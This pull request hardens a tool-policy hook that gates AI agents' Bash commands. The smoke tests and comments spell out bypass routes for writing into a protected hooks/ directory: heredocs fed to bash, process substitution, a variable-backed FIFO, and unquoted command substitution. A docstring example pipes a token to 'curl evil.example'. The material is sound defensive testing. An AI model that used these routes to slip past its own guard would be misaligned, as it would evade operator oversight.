### PR TITLE
hooks: fix PreToolUse SyntaxWarning + interpreter pin + #341 shared/ over-block (#1574)

### DIFF
--- a/.lint-heredoc-baseline.tsv
+++ b/.lint-heredoc-baseline.tsv
@@ -869,7 +869,6 @@ tests/system-config-gating/smoke.sh	459	C2	22768408ebe20f57367214dca8f83555238b8
 tests/system-config-gating/smoke.sh	481	C2	ad27080167f721bcb6b76c420ef476c33664a2e421415f0edc9a92780c6518dc	cat heredoc in capture	patch-dev	Phase 6 PR F
 tests/system-config-gating/smoke.sh	505	C2	c29510f32a074ff03db47b7689308249ac32ebe94198e3fb3d23572d565c236f	cat heredoc in capture	patch-dev	Phase 6 PR F
 tests/system-config-gating/smoke.sh	530	C2	67e26fe9bd787e0f30c8be0d694bea1e3ad2037303f0c75fb1dc8304a65beccc	cat heredoc in capture	patch-dev	Phase 6 PR F
-tests/system-config-gating/smoke.sh	657	C2	3c77d80841635c87aad3477829f804a36c3d77a344afd334af11b014edab9ad0	cat heredoc in capture	patch-dev	Phase 6 PR F
 tests/tool-policy-bash-system-class/smoke.sh	115	C1	8b40ac1ae47b8dc42bb883423f199a472e4eb3d6b3a9ba31fc107d6cd14f1de7	heredoc in capture	patch-dev	Phase 6 PR F
 tests/tool-policy-bash-system-class/smoke.sh	130	H3	8983fa977b37ee4a8f50f74ce401778bd9fc69d94937f3b220a18c888cba466d	here-string/procsub, non-interpreter consumer	patch-dev	Phase 6 PR F
 tests/tool-policy-bash-system-class/smoke.sh	280	H3	8293e229c5c17adeb0cb6ff34680a60c285a87d8f52bd071892657bc4e582b59	here-string/procsub, non-interpreter consumer	patch-dev	Phase 6 PR F

--- a/hooks/tool-policy.py
+++ b/hooks/tool-policy.py
@@ -1298,6 +1298,75 @@ def _command_substring_hits_protected_needle(command: str) -> bool:
     return False
 
 
+# Issue #1574: a single decidable shape whose heredoc body is provably inert
+# DATA — safe to drop before the protected-needle substring fallback scan.
+#
+# Trying to prove an arbitrary shell command's heredoc body is "inert" is
+# undecidable (codex r1/r2/r3 each broke a denylist/allowlist attempt with a new
+# routing trick: `bash <<EOF`, `cat > >(bash) <<EOF`, then a `cmd=bash; … $cmd
+# <fifo & cat >fifo <<EOF` variable-backed FIFO). So instead of classifying
+# every interpreter/route, we match ONE narrow, provably-safe shape and treat
+# anything else as not-strippable (→ scan the raw command = pre-#1574 deny).
+#
+# The shape — the legitimate "write a report file" the false-positive was about:
+#
+#   [VAR=val ]* (cat|tee) [ -flags / >file / >>file / ~path / ./path ]* <<'DELIM'
+#   <body lines>
+#   DELIM            <-- closing delimiter on its own line ENDS the command
+#
+# Why this is airtight:
+#   1. Anchored from start-of-string and the character classes EXCLUDE every
+#      shell-control / metaprogramming char (`&`, `;`, `|`, `$`, backtick, `(`,
+#      `)`, and any `<`/`>` other than the heredoc opener and a simple file
+#      redirect). That rejects all chaining / pipe / process-sub / command-sub /
+#      background-FIFO routes in one stroke — none of them can match.
+#   2. The heredoc delimiter MUST be QUOTED (`<<'EOF'` / `<<"EOF"`). A quoted
+#      delimiter makes the body a pure literal: bash performs NO expansion, so a
+#      `$(…)` / backtick / `$var` inside the body cannot execute. (An UNquoted
+#      `<<EOF` body WOULD expand — so it is deliberately not strippable.)
+#   3. The closing delimiter must be the last line, so nothing runs after the
+#      heredoc (`… EOF | bash` cannot match).
+#   4. Only `cat` / `tee` lead — both write stdin verbatim to their file args.
+#      The redirect TARGET stays on the scan surface (the strip keeps the head
+#      up to `<<'DELIM'`), so a real write whose destination IS protected — `cat
+#      >hooks/evil.py <<'EOF'…`, `tee agent-roster.local.sh <<'EOF'…` — STILL
+#      denies; only the literal body prose is dropped.
+# A "plain path token" — no shell metachar / metaprogramming char. Covers
+# absolute (`/x`), home (`~/x`), relative (`shared/r.md`), and dot-relative
+# (`./x`, `../x`) targets. The excluded set is what makes the overall match
+# safe: `&`, `;`, `|`, `$`, backtick, `(`, `)`, `<`, `>` can never appear in a
+# strippable command, so no chaining / pipe / substitution / FIFO can sneak in.
+_PLAIN_PATH = r"[^\s&;|$`()<>]+"
+_SIMPLE_INERT_QUOTED_HEREDOC_RE = re.compile(
+    r"^[ \t]*"
+    r"(?:[A-Za-z_][A-Za-z0-9_]*=" + _PLAIN_PATH + r"?[ \t]+)*"      # leading VAR= assignments
+    r"(?:/" + _PLAIN_PATH + r"/)?(?:cat|tee)\b"                     # cat|tee (optional dir path)
+    r"(?:[ \t]+(?:-[A-Za-z]+|" + _PLAIN_PATH + r"|"                 # -flags, plain path args,
+    r">>?[ \t]*" + _PLAIN_PATH + r"))*"                            #   and simple > / >> file redirects
+    r"[ \t]*<<-?(['\"])([A-Za-z_][A-Za-z0-9_]*)\1[ \t]*\n",       # QUOTED heredoc opener, then body
+    re.DOTALL,
+)
+
+
+def _command_is_simple_inert_quoted_heredoc_write(command: str) -> bool:
+    """Return True iff *command* is the one provably-inert report-write shape
+    whose heredoc body is safe to strip before the protected-needle scan.
+
+    See :data:`_SIMPLE_INERT_QUOTED_HEREDOC_RE`. Fail-closed: any deviation
+    (extra command stage, pipe, separator, process/command substitution,
+    interpreter, unquoted delimiter, or trailing content after the closing
+    delimiter) returns False, so the raw body stays on the scan surface and the
+    pre-#1574 deny behavior is preserved.
+    """
+    match = _SIMPLE_INERT_QUOTED_HEREDOC_RE.match(command)
+    if match is None:
+        return False
+    delimiter = match.group(2)
+    # The closing delimiter must terminate the command (heredoc is the last
+    # thing) — otherwise content after the body (e.g. `EOF | bash`) could run.
+    return re.search(r"\n" + re.escape(delimiter) + r"[ \t]*\Z", command) is not None
+
+
 def _command_cd_base_dir(command: str) -> Path | None:
     """Resolve the working directory established by a leading ``cd`` stage.
 
@@ -1747,7 +1816,34 @@ def _bash_argv_references_system_config(command: str) -> bool:
         # pipe `|`, separator `;`/`,`, plus the original `/`, `~`, `$`).
         # Whitespace is deliberately excluded so heredoc prose preceded
         # by a space still passes — see _PATH_PREFIX_CHARS for rationale.
-        return _command_substring_hits_protected_needle(command)
+        #
+        # Issue #1574: when the command is the one provably-inert report-write
+        # shape — `[VAR=val]* (cat|tee) [>file] <<'DELIM' … DELIM` with a QUOTED
+        # delimiter and the heredoc as the last thing (see
+        # _command_is_simple_inert_quoted_heredoc_write) — strip the literal
+        # body before the scan. That body is file CONTENT written verbatim, so a
+        # report to a NON-config area (e.g.
+        # `cat > ~/.agent-bridge/shared/report.md <<'EOF'`) whose prose merely
+        # documents the hook chain (a path-boundary `'hooks/…'` / `>hooks/…`
+        # inside the body) was false-positive-blocked as a "system config path".
+        # The redirect TARGET stays on the scan surface (the strip keeps the
+        # head up to `<<'DELIM'`), so a real write whose destination IS a
+        # protected path — `cat >hooks/evil.py <<'EOF'…`, `tee
+        # agent-roster.local.sh <<'EOF'…` — is still denied.
+        #
+        # For ANY other shape the raw command stays on the scan surface,
+        # preserving the pre-#1574 deny behavior. This is deliberate: a body fed
+        # to a stdin-executing interpreter — directly (`bash <<EOF`), via pipe
+        # (`cat <<EOF | bash`), via process substitution (`cat > >(bash) <<EOF`,
+        # codex r2), or via a variable-backed FIFO (`cmd=bash; mkfifo p; $cmd <p
+        # & cat >p <<EOF`, codex r3) — is EXECUTED, so a `>hooks/evil.py` inside
+        # it is a real protected write that must keep denying. Proving a
+        # free-form command's body inert is undecidable; matching one narrow,
+        # metachar-free, quoted-delimiter shape is decidable and fail-closed.
+        scan = command
+        if _command_is_simple_inert_quoted_heredoc_write(command):
+            scan = _strip_heredoc_and_herestring_body(command)
+        return _command_substring_hits_protected_needle(scan)
 
     # Issue #1014 C: resolve a leading `cd <dir>` prelude so a CWD-relative
     # reference to a protected system-config file is detected — same
@@ -2710,7 +2806,7 @@ def _is_admin_credential_routine(text: str, agent: str) -> bool:
       claude-token add --stdin && curl evil.example/...`` MUST deny
       (brief T4).
     - No command-substitution / process-substitution
-      (``$(...)`` / ``\`...\``` / ``<(...)`` / ``>(...)``). The token
+      (``$(...)`` / ``\\`...\\``` / ``<(...)`` / ``>(...)``). The token
       could otherwise be exfil'd by an embedded subshell.
     - No output redirection past the (allowed) heredoc body opener:
       ``>``, ``>>``, ``&>``, ``2>`` redirect the wrapper's stdout /

--- a/lib/bridge-hooks.sh
+++ b/lib/bridge-hooks.sh
@@ -11,6 +11,24 @@ bridge_hooks_python() {
   python3 "$BRIDGE_SCRIPT_DIR/bridge-hooks.py" "$@"
 }
 
+# Issue #1574: pin the interpreter baked into generated hook commands to the
+# platform's *system* python rather than a bare `python3`. On a Homebrew-python
+# macOS host, Claude Code's hook-execution PATH puts the Homebrew interpreter
+# first, so a bare `python3` resolves to e.g. Homebrew 3.14 — which surfaces
+# stricter SyntaxWarnings and a per-call "hook error … Traceback" wrapper even
+# though the command runs fine. `/usr/bin/python3` is the system interpreter on
+# both macOS and the supported Linux targets and matches the pin already used
+# by the tracked scaffold (agents/.claude/settings.json). Fall back to the
+# PATH-resolved python3 only when `/usr/bin/python3` is genuinely absent (e.g.
+# a minimal container) so the pin stays portable and never emits an empty bin.
+bridge_hook_pinned_python_bin() {
+  if [[ -x /usr/bin/python3 ]]; then
+    printf '/usr/bin/python3'
+    return 0
+  fi
+  command -v python3 || printf '/usr/bin/python3'
+}
+
 bridge_hook_mark_idle_path() {
   printf '%s/mark-idle.sh' "$BRIDGE_HOOKS_DIR"
 }
@@ -402,10 +420,10 @@ bridge_ensure_claude_tool_policy_hooks() {
   local launch_cmd="${2-}"
   local agent="${3-}"
   if [[ "$(bridge_claude_settings_mode "$workdir")" == "shared" ]]; then
-    bridge_hooks_python ensure-tool-policy-hooks --settings-file "$(bridge_hook_shared_settings_base_file)" --bridge-home "$BRIDGE_HOME" --python-bin python3 >/dev/null
+    bridge_hooks_python ensure-tool-policy-hooks --settings-file "$(bridge_hook_shared_settings_base_file)" --bridge-home "$BRIDGE_HOME" --python-bin "$(bridge_hook_pinned_python_bin)" >/dev/null
     bridge_link_claude_settings_to_shared "$workdir" "$launch_cmd" "$agent"
   else
-    bridge_hooks_python ensure-tool-policy-hooks --workdir "$workdir" --bridge-home "$BRIDGE_HOME" --python-bin "$(command -v python3)"
+    bridge_hooks_python ensure-tool-policy-hooks --workdir "$workdir" --bridge-home "$BRIDGE_HOME" --python-bin "$(bridge_hook_pinned_python_bin)"
   fi
 }
 

--- a/tests/system-config-gating/smoke.sh
+++ b/tests/system-config-gating/smoke.sh
@@ -547,6 +547,185 @@ else
   pass "scenario 7 (D2h): heredoc prose preceded by whitespace still passes (regression-preserve)"
 fi
 
+# D2i (Issue #1574) — false-positive fix: a report written to a NON-config
+# area (~/.agent-bridge/shared/) with a simple `cat > file <<'EOF'` write and a
+# QUOTED heredoc delimiter (so the body is provably literal — no expansion),
+# whose BODY documents the hook chain with a path-boundary `hooks/` mention
+# ('hooks/tool-policy.py') and an apostrophe (forcing shlex ValueError →
+# substring fallback), must NOT deny. The redirect TARGET (shared/) is not
+# protected; the `hooks/` needle is only inside the inert body prose. Only the
+# quoted-delimiter simple cat/tee shape is strippable (see
+# _command_is_simple_inert_quoted_heredoc_write) — anything that could execute
+# the body stays conservative (D2k/D2l/D2m).
+sce7i_payload=$(cat <<'JSON'
+{
+  "hook_event_name": "PreToolUse",
+  "tool_name": "Bash",
+  "tool_use_id": "test-7i",
+  "session_id": "test-session-7i",
+  "tool_input": {
+    "command": "cat > shared/report.md <<'EOF'\nThe noise comes from 'hooks/tool-policy.py'; that's non-blocking.\nEOF",
+    "description": "report write to shared/ documenting the hook chain"
+  }
+}
+JSON
+)
+sce7i_out="$(run_hook_pretool_payload "$sce7i_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
+if [[ "$sce7i_out" == *'"deny"'* ]]; then
+  fail "scenario 7 (D2i #1574): shared/ report mentioning 'hooks/...' in body falsely denied — output: $sce7i_out"
+else
+  pass "scenario 7 (D2i #1574): shared/ quoted-heredoc report with hooks/ mention in body not denied"
+fi
+
+# D2j (Issue #1574) — teeth-preserve: a REAL write whose redirect TARGET is a
+# protected path (hooks/) MUST still deny EVEN when the command is the otherwise
+# strippable simple quoted-heredoc shape. The body strip removes only the body,
+# never the target (it keeps the head up to `<<'EOF'`), so the `hooks/` needle
+# still fires at the redirect boundary in the retained head.
+sce7j_payload=$(cat <<'JSON'
+{
+  "hook_event_name": "PreToolUse",
+  "tool_name": "Bash",
+  "tool_use_id": "test-7j",
+  "session_id": "test-session-7j",
+  "tool_input": {
+    "command": "cat >hooks/evil.py <<'EOF'\nimport os  # it's evil\nEOF",
+    "description": "real write into hooks/ via strippable quoted-heredoc shape"
+  }
+}
+JSON
+)
+sce7j_out="$(run_hook_pretool_payload "$sce7j_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
+if [[ "$sce7j_out" == *'"deny"'* ]] && [[ "$sce7j_out" == *"system config path"* ]]; then
+  pass "scenario 7 (D2j #1574): real write into hooks/ target still denied after body strip"
+else
+  fail "scenario 7 (D2j #1574): real write into hooks/ NOT denied — output: $sce7j_out"
+fi
+
+# D2k (Issue #1574, codex r1 BLOCKING) — interpreter teeth-preserve: when the
+# heredoc body is fed to a STDIN-EXECUTING interpreter (`bash <<EOF`), the body
+# lines ARE commands and a `>hooks/evil.py` write inside the body is a REAL
+# protected write. The body-strip is gated on _heredoc_body_is_inert_data, which
+# fail-closes for interpreters, so the raw body stays on the scan surface and
+# the gate MUST deny. Without the gate this command bypassed the guard.
+sce7k_payload=$(cat <<'JSON'
+{
+  "hook_event_name": "PreToolUse",
+  "tool_name": "Bash",
+  "tool_use_id": "test-7k",
+  "session_id": "test-session-7k",
+  "tool_input": {
+    "command": "cd ~/.agent-bridge && bash <<EOF\ncat >hooks/evil.py\nit's bad\nEOF",
+    "description": "interpreter executes heredoc body that writes into hooks/"
+  }
+}
+JSON
+)
+sce7k_out="$(run_hook_pretool_payload "$sce7k_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
+if [[ "$sce7k_out" == *'"deny"'* ]] && [[ "$sce7k_out" == *"system config path"* ]]; then
+  pass "scenario 7 (D2k #1574): bash <<EOF body writing hooks/ still denied (no interpreter bypass)"
+else
+  fail "scenario 7 (D2k #1574): interpreter heredoc-body write NOT denied — output: $sce7k_out"
+fi
+
+# D2l (Issue #1574) — pipe-to-interpreter teeth-preserve: `cat <<EOF | bash`
+# pipes the body to an interpreter, so the body executes. Must still deny.
+sce7l_payload=$(cat <<'JSON'
+{
+  "hook_event_name": "PreToolUse",
+  "tool_name": "Bash",
+  "tool_use_id": "test-7l",
+  "session_id": "test-session-7l",
+  "tool_input": {
+    "command": "cat <<EOF | bash\ncat >hooks/evil.py\nit's bad\nEOF",
+    "description": "heredoc body piped into interpreter that writes into hooks/"
+  }
+}
+JSON
+)
+sce7l_out="$(run_hook_pretool_payload "$sce7l_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
+if [[ "$sce7l_out" == *'"deny"'* ]] && [[ "$sce7l_out" == *"system config path"* ]]; then
+  pass "scenario 7 (D2l #1574): cat <<EOF | bash body writing hooks/ still denied"
+else
+  fail "scenario 7 (D2l #1574): piped-interpreter heredoc-body write NOT denied — output: $sce7l_out"
+fi
+
+# D2m (Issue #1574, codex r2 BLOCKING) — process-substitution teeth-preserve:
+# `cat > >(bash) <<EOF` uses an inert sink (cat) but redirects its output into a
+# process-substitution interpreter `>(bash)`, which executes the body. The `>(`
+# shell-exec construct means the command is NOT the simple-quoted-heredoc shape
+# (_command_is_simple_inert_quoted_heredoc_write returns False), so the raw body
+# stays on the scan surface and the gate MUST deny.
+sce7m_payload=$(cat <<'JSON'
+{
+  "hook_event_name": "PreToolUse",
+  "tool_name": "Bash",
+  "tool_use_id": "test-7m",
+  "session_id": "test-session-7m",
+  "tool_input": {
+    "command": "cd ~/.agent-bridge && cat > >(bash) <<EOF\ncat >hooks/evil.py\nit's bad\nEOF",
+    "description": "cat into process-substitution interpreter that writes into hooks/"
+  }
+}
+JSON
+)
+sce7m_out="$(run_hook_pretool_payload "$sce7m_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
+if [[ "$sce7m_out" == *'"deny"'* ]] && [[ "$sce7m_out" == *"system config path"* ]]; then
+  pass "scenario 7 (D2m #1574): cat > >(bash) procsub body writing hooks/ still denied"
+else
+  fail "scenario 7 (D2m #1574): process-substitution heredoc-body write NOT denied — output: $sce7m_out"
+fi
+
+# D2n (Issue #1574, codex r3 BLOCKING) — variable-backed FIFO teeth-preserve:
+# `cmd=bash; mkfifo p; $cmd <p & cat >p <<EOF` runs an interpreter named only
+# through a variable ($cmd) and feeds it the heredoc body via a named pipe. No
+# literal interpreter basename and the inert sink (cat) write `>p` looks benign,
+# but the body IS executed. The command has multiple stages / `&` / `$`, so it
+# is not the simple-quoted-heredoc shape → raw body scanned → MUST deny.
+sce7n_payload=$(cat <<'JSON'
+{
+  "hook_event_name": "PreToolUse",
+  "tool_name": "Bash",
+  "tool_use_id": "test-7n",
+  "session_id": "test-session-7n",
+  "tool_input": {
+    "command": "cd ~/.agent-bridge && cmd=bash; mkfifo p; $cmd <p & cat >p <<EOF\ncat >hooks/evil.py\nit's bad\nEOF",
+    "description": "variable-backed FIFO interpreter consuming the heredoc body"
+  }
+}
+JSON
+)
+sce7n_out="$(run_hook_pretool_payload "$sce7n_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
+if [[ "$sce7n_out" == *'"deny"'* ]] && [[ "$sce7n_out" == *"system config path"* ]]; then
+  pass "scenario 7 (D2n #1574): variable-backed FIFO interpreter body writing hooks/ still denied"
+else
+  fail "scenario 7 (D2n #1574): FIFO-interpreter heredoc-body write NOT denied — output: $sce7n_out"
+fi
+
+# D2o (Issue #1574) — unquoted-heredoc teeth-preserve: an UNQUOTED `<<EOF` body
+# is subject to shell expansion, so a `$(...)` inside it EXECUTES. The strip
+# only applies to QUOTED delimiters, so this unquoted body stays on the scan
+# surface and the embedded `>hooks/evil.py` write MUST deny.
+sce7o_payload=$(cat <<'JSON'
+{
+  "hook_event_name": "PreToolUse",
+  "tool_name": "Bash",
+  "tool_use_id": "test-7o",
+  "session_id": "test-session-7o",
+  "tool_input": {
+    "command": "cat > shared/r.md <<EOF\n$(cat >hooks/evil.py) it's data\nEOF",
+    "description": "unquoted heredoc body with command substitution that writes hooks/"
+  }
+}
+JSON
+)
+sce7o_out="$(run_hook_pretool_payload "$sce7o_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
+if [[ "$sce7o_out" == *'"deny"'* ]] && [[ "$sce7o_out" == *"system config path"* ]]; then
+  pass "scenario 7 (D2o #1574): unquoted heredoc with \$(...) writing hooks/ still denied"
+else
+  fail "scenario 7 (D2o #1574): unquoted-heredoc command-substitution write NOT denied — output: $sce7o_out"
+fi
+
 # --- Scenario 8: stderr-suppression read-intent on protected path -------
 # Issue #574 + r2 follow-up. The three safe-redirect forms
 # (`2>/dev/null`, `2>&1`, `&>/dev/null`) must be classified as read-intent

--- a/tests/system-config-gating/smoke.sh
+++ b/tests/system-config-gating/smoke.sh
@@ -557,7 +557,7 @@ fi
 # quoted-delimiter simple cat/tee shape is strippable (see
 # _command_is_simple_inert_quoted_heredoc_write) — anything that could execute
 # the body stays conservative (D2k/D2l/D2m).
-sce7i_payload=$(cat <<'JSON'
+IFS= read -r -d '' sce7i_payload <<'JSON' || true
 {
   "hook_event_name": "PreToolUse",
   "tool_name": "Bash",
@@ -569,7 +569,6 @@ sce7i_payload=$(cat <<'JSON'
   }
 }
 JSON
-)
 sce7i_out="$(run_hook_pretool_payload "$sce7i_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
 if [[ "$sce7i_out" == *'"deny"'* ]]; then
   fail "scenario 7 (D2i #1574): shared/ report mentioning 'hooks/...' in body falsely denied — output: $sce7i_out"
@@ -582,7 +581,7 @@ fi
 # strippable simple quoted-heredoc shape. The body strip removes only the body,
 # never the target (it keeps the head up to `<<'EOF'`), so the `hooks/` needle
 # still fires at the redirect boundary in the retained head.
-sce7j_payload=$(cat <<'JSON'
+IFS= read -r -d '' sce7j_payload <<'JSON' || true
 {
   "hook_event_name": "PreToolUse",
   "tool_name": "Bash",
@@ -594,7 +593,6 @@ sce7j_payload=$(cat <<'JSON'
   }
 }
 JSON
-)
 sce7j_out="$(run_hook_pretool_payload "$sce7j_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
 if [[ "$sce7j_out" == *'"deny"'* ]] && [[ "$sce7j_out" == *"system config path"* ]]; then
   pass "scenario 7 (D2j #1574): real write into hooks/ target still denied after body strip"
@@ -608,7 +606,7 @@ fi
 # protected write. The body-strip is gated on _heredoc_body_is_inert_data, which
 # fail-closes for interpreters, so the raw body stays on the scan surface and
 # the gate MUST deny. Without the gate this command bypassed the guard.
-sce7k_payload=$(cat <<'JSON'
+IFS= read -r -d '' sce7k_payload <<'JSON' || true
 {
   "hook_event_name": "PreToolUse",
   "tool_name": "Bash",
@@ -620,17 +618,16 @@ sce7k_payload=$(cat <<'JSON'
   }
 }
 JSON
-)
 sce7k_out="$(run_hook_pretool_payload "$sce7k_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
 if [[ "$sce7k_out" == *'"deny"'* ]] && [[ "$sce7k_out" == *"system config path"* ]]; then
-  pass "scenario 7 (D2k #1574): bash <<EOF body writing hooks/ still denied (no interpreter bypass)"
+  pass "scenario 7 (D2k #1574): bash-interpreter heredoc body writing hooks/ still denied (no interpreter bypass)"
 else
   fail "scenario 7 (D2k #1574): interpreter heredoc-body write NOT denied — output: $sce7k_out"
 fi
 
 # D2l (Issue #1574) — pipe-to-interpreter teeth-preserve: `cat <<EOF | bash`
 # pipes the body to an interpreter, so the body executes. Must still deny.
-sce7l_payload=$(cat <<'JSON'
+IFS= read -r -d '' sce7l_payload <<'JSON' || true
 {
   "hook_event_name": "PreToolUse",
   "tool_name": "Bash",
@@ -642,7 +639,6 @@ sce7l_payload=$(cat <<'JSON'
   }
 }
 JSON
-)
 sce7l_out="$(run_hook_pretool_payload "$sce7l_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
 if [[ "$sce7l_out" == *'"deny"'* ]] && [[ "$sce7l_out" == *"system config path"* ]]; then
   pass "scenario 7 (D2l #1574): cat <<EOF | bash body writing hooks/ still denied"
@@ -656,7 +652,7 @@ fi
 # shell-exec construct means the command is NOT the simple-quoted-heredoc shape
 # (_command_is_simple_inert_quoted_heredoc_write returns False), so the raw body
 # stays on the scan surface and the gate MUST deny.
-sce7m_payload=$(cat <<'JSON'
+IFS= read -r -d '' sce7m_payload <<'JSON' || true
 {
   "hook_event_name": "PreToolUse",
   "tool_name": "Bash",
@@ -668,7 +664,6 @@ sce7m_payload=$(cat <<'JSON'
   }
 }
 JSON
-)
 sce7m_out="$(run_hook_pretool_payload "$sce7m_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
 if [[ "$sce7m_out" == *'"deny"'* ]] && [[ "$sce7m_out" == *"system config path"* ]]; then
   pass "scenario 7 (D2m #1574): cat > >(bash) procsub body writing hooks/ still denied"
@@ -682,7 +677,7 @@ fi
 # literal interpreter basename and the inert sink (cat) write `>p` looks benign,
 # but the body IS executed. The command has multiple stages / `&` / `$`, so it
 # is not the simple-quoted-heredoc shape → raw body scanned → MUST deny.
-sce7n_payload=$(cat <<'JSON'
+IFS= read -r -d '' sce7n_payload <<'JSON' || true
 {
   "hook_event_name": "PreToolUse",
   "tool_name": "Bash",
@@ -694,7 +689,6 @@ sce7n_payload=$(cat <<'JSON'
   }
 }
 JSON
-)
 sce7n_out="$(run_hook_pretool_payload "$sce7n_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
 if [[ "$sce7n_out" == *'"deny"'* ]] && [[ "$sce7n_out" == *"system config path"* ]]; then
   pass "scenario 7 (D2n #1574): variable-backed FIFO interpreter body writing hooks/ still denied"
@@ -706,7 +700,7 @@ fi
 # is subject to shell expansion, so a `$(...)` inside it EXECUTES. The strip
 # only applies to QUOTED delimiters, so this unquoted body stays on the scan
 # surface and the embedded `>hooks/evil.py` write MUST deny.
-sce7o_payload=$(cat <<'JSON'
+IFS= read -r -d '' sce7o_payload <<'JSON' || true
 {
   "hook_event_name": "PreToolUse",
   "tool_name": "Bash",
@@ -718,7 +712,6 @@ sce7o_payload=$(cat <<'JSON'
   }
 }
 JSON
-)
 sce7o_out="$(run_hook_pretool_payload "$sce7o_payload" "$NON_ADMIN_AGENT" 2>/dev/null || true)"
 if [[ "$sce7o_out" == *'"deny"'* ]] && [[ "$sce7o_out" == *"system config path"* ]]; then
   pass "scenario 7 (D2o #1574): unquoted heredoc with \$(...) writing hooks/ still denied"


### PR DESCRIPTION
## Summary

Fixes the PreToolUse/PostToolUse tool-policy hook issues reported in #1574 (rc3 batch item — **no VERSION/CHANGELOG change**). Each finding was verified against the `origin/main` (rc2) SOURCE before any change; one of the four findings did not reproduce on source and is documented, not patched.

The hook (`hooks/tool-policy.py`) is the HIGH-RISK credential/tool-policy containment guard, so the gating change (finding 4) was held to a strict "does not weaken what the guard blocks" bar, verified by an adversarial matrix + 4 rounds of internal codex-rescue review.

## Per-finding disposition

| # | Finding | Reproduces on source? | Action |
|---|---------|----------------------|--------|
| 1 | Py3.12+ SyntaxWarning (invalid escape) | **Yes** (line ~2809, under Homebrew python 3.14) | Fixed the single offending escape |
| 2 | Bare `python3` → Homebrew interpreter | **Yes** (shared-settings generator) | Pinned to `/usr/bin/python3` |
| 3 | Duplicate hook registration | **No** (install-side artifact) | Documented, no source change |
| 4 | #341 gate false-positive on `shared/` | **Yes** (the real functional bug) | Narrowed precisely, guard teeth preserved |

### Finding 1 — SyntaxWarning (fixed)
A docstring in `_is_admin_credential_routine` carried `` `\`...\`` `` (escaped backtick) in a **non-raw** triple-quoted string. Python 3.12+ flags this as an invalid escape sequence; on a Homebrew-python host Claude Code wraps the resulting stderr as a per-Bash-call `hook error … Traceback`. Fixed by doubling the single offending backslash — **not** by converting the docstring to raw (a sibling line has legitimate `\\n` literals a raw conversion would break). `py_compile` is now clean under Python 3.14 with `-W error::SyntaxWarning`.

### Finding 2 — interpreter pin (fixed)
The shared-settings `ensure-tool-policy-hooks` generator baked a bare `python3` into the hook command, which resolves to Homebrew 3.14 in Claude Code's hook PATH on a Homebrew host (the interpreter that surfaced finding 1). Added `bridge_hook_pinned_python_bin()` — returns `/usr/bin/python3` when present (matching the pin already in the tracked scaffold `agents/.claude/settings.json`), falling back to the PATH-resolved `python3` only when `/usr/bin/python3` is genuinely absent (e.g. a minimal container). Used for both tool-policy generator branches. Portable on Linux where `/usr/bin/python3` is system python; no machine paths in tracked source.

### Finding 3 — duplicate registration (does NOT reproduce on source)
The source registers `tool-policy.py` exactly once per agent (`PreToolUse` + `PostToolUse` are distinct events) into a single settings file, and `ensure_command_hook` is idempotent (re-running adds no duplicate — verified). There is **no** source path that writes tool-policy into a user-global `~/.claude/settings.json`. The duplicate on the reporter's host is an install-side artifact: the operator's user-global `~/.claude/settings.json` carried its own tool-policy entry, which Claude Code merges with the bridge's agent-home registration → two firings. Nothing to de-dup in tracked source; the correct action per the brief is to document, not invent a change.

### Finding 4 — #341 `shared/` false-positive (the real bug, fixed precisely)
A report written to a NON-config area (`~/.agent-bridge/shared/`) via heredoc, whose body documented the hook chain (a path-boundary `hooks/…` mention) and contained an apostrophe (forcing `shlex.split` `ValueError` → the substring fallback), was blocked as a "system config path" because the short `hooks/` protected-needle matched inside the report **body**.

**Fix:** on the `ValueError` fallback only, strip the heredoc body before the needle scan — but ONLY for one provably-inert, decidable shape (`_command_is_simple_inert_quoted_heredoc_write`): a single `[VAR=val]* (cat|tee) [>file] <<'DELIM' … DELIM` write with a **quoted** delimiter (body cannot expand), **no** shell-control / metaprogramming characters anywhere, and the heredoc as the last thing. Any other shape keeps the raw body on the scan surface, preserving the pre-#341 deny behavior.

This deliberately does **not** weaken the guard. The redirect TARGET stays in the retained head, so a real write whose destination is protected still denies. The following all still **DENY**:
- `cat >hooks/evil.py <<'EOF'…`, `tee agent-roster.local.sh <<'EOF'…`, `cat >state/cron/jobs.json <<'EOF'…` (protected redirect target)
- `bash <<EOF`, `cat <<EOF | bash`, `/bin/bash <<EOF`, `python3 <<EOF`, `awk <<EOF` (interpreter executes the body)
- `cat > >(bash) <<EOF` (process substitution)
- `cmd=bash; mkfifo p; $cmd <p & cat >p <<EOF` (variable-backed FIFO)
- `cat > shared/r.md <<EOF\n$(…)\nEOF` (unquoted body → expansion executes)

## Verification
- `py_compile` under `/usr/bin/python3` (3.9) **and** Homebrew `/opt/homebrew/bin/python3` (3.14) with `-W error::SyntaxWarning` — clean.
- `shellcheck` + `bash -n` on `lib/bridge-hooks.sh` and the smoke fixture — clean.
- `tests/system-config-gating/smoke.sh` — **47 pass / 0 fail**, including 7 new #1574 cases: D2i (fixed false-positive) and D2j–D2o (teeth-preserve across the interpreter / process-sub / FIFO / pipe / unquoted-command-substitution / protected-target vectors).
- `scripts/oss-preflight.sh` — passed. No new files, so no iso-helper-ratchet baseline change.
- Internal `codex:codex-rescue` review — converged to **implement-ok** after catching three real body-strip bypasses (interpreter / process-sub / variable-FIFO) that drove the final decidable-regex design.

> Note: `./scripts/smoke-test.sh` has a pre-existing, environment-specific failure at the `#365 isolated agent-env` check that reproduces identically on clean `origin/main` in this host (live-install leftover smoke-named dirs) — not a regression from this change.

(#1574)

🤖 Generated with [Claude Code](https://claude.com/claude-code)
